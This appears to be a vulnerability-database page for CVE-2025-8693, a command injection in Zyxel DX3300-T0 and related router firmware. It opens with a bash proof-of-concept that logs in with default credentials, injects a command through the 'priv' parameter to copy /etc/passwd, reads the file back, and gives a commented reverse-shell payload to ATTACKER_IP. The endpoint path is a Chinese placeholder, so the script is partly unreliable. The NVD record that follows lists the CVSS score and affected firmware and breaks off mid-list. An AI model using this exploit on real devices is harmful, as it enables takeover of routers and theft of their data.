CVE-2025-8693

#!/bin/bash # CVE-2025-8693 PoC - Zyxel DX3300-T0 Command Injection # Author: Security Researcher # Note: This is for authorized testing only TARGET="http://192.168.1.1" USERNAME="admin" PASSWORD="admin123" # Step 1: Login to get session cookie LOGIN_DATA="username=$USERNAME&password=$PASSWORD" COOKIES=$(curl -s -c - -d "$LOGIN_DATA" "$TARGET/cgi-bin/login.cgi" | grep -oP 'session=\S+') # Step 2: Exploit command injection via priv parameter # Inject command to create a test file and read /etc/passwd PAYLOAD=';cat /etc/passwd > /tmp/pwned.txt;' EXPLOIT_URL="$TARGET/cgi-bin/某些管理接口?priv=$PAYLOAD" curl -s -b "$COOKIES" "$EXPLOIT_URL" # Step 3: Read the exfiltrated data echo "[*] Reading exfiltrated data..." curl -s -b "$COOKIES" "$TARGET/tmp/pwned.txt" # Reverse shell payload example: # ';bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1;' echo "[+] Exploitation complete"

{"cve": {"id": "CVE-2025-8693", "sourceIdentifier": "[email protected]", "published": "2025-11-18T02:15:45.410", "lastModified": "2025-12-15T14:03:35.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A post-authentication command injection vulnerability in the \"priv\" parameter of Zyxel DX3300-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an authenticated attacker to execute operating system (OS) commands on an affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dm4200-b0_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.17\\(acbs.1.3\\)c0", "matchCriteriaId": "2E286050-5B6D-427D-B1F8-08AE6BAE86F8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dm4200-b0:-:*:*:*:*:*:*:*", "matchCriteriaId": "F5F90F23-614E-44D9-B2A4-2E29EC35C7C3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dx3300-t0_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.50\\(abvy.6.3\\)c0", "matchCriteriaId": "59F122AA-72C9-48A3-B499-AA277220215F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dx3300-t0:-:*:*:*:*:*:*:*", "matchCriteriaId": "6D3E176E-F728-4385-8533-4C694D43898A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dx3300-t1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.50\\(abvy.6.3\\)c0", "matchCriteriaId": "156A5D10-7AF1-414D-9CF7-CA649C6E5793"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dx3300-t1:-:*:*:*:*:*:*:*", "matchCriteriaId": "2456F691-C182-4BE6-A08F-5E1717366DCA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dx3301-t0_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.50\\(abvy.6.3\\)c0", "matchCriteriaId": "70360542-DC98-4C1B-96CA-5A1D15888FC3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dx3301-t0:-:*:*:*:*:*:*:*", "matchCriteriaId": "3BBDC072-5D40-4130-9B5F-22FDA9BF909A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dx4510-b1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.17\\(abyl.9\\)c0", "matchCriteriaId": "4F2BD4CD-D44E-4A92-B4C7-C19FCF58298B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dx4510-b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "C8668990-045A-4DDD-9089-DE0025B69765"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dx5401-b0_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.17\\(abyo.7\\)b2", "matchCriteriaId": "26C06227-D225-40DE-86C8-86244BA31688"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dx5401-b0:-:*:*:*:*:*:*:*", "matchCriteriaId": "B293E564-2C48-442A-A415-34383DF3ADBA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:dx5401-b1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.17\\(abyo.7\\)b2", "matchCriteriaId": "0CE8D3AA-7BB0-4AF3-A904-1A4CFB110C06"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:dx5401-b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFE5C53C-4255-4AEE-A49E-36C1A2CF10F5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:ee3301-00_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.63\\(acmu.1.1\\)c0", "matchCriteriaId": "4E7CA003-DB41-4078-895D-77806B45C08E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zyxel:ee3301-00:-:*:*:*:*:*:*:*", "matchCriteriaId": "6360F4D5-AFA7-4BE2-A3DE-8936453FF7ED"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zyxel:ee5 ... (truncated)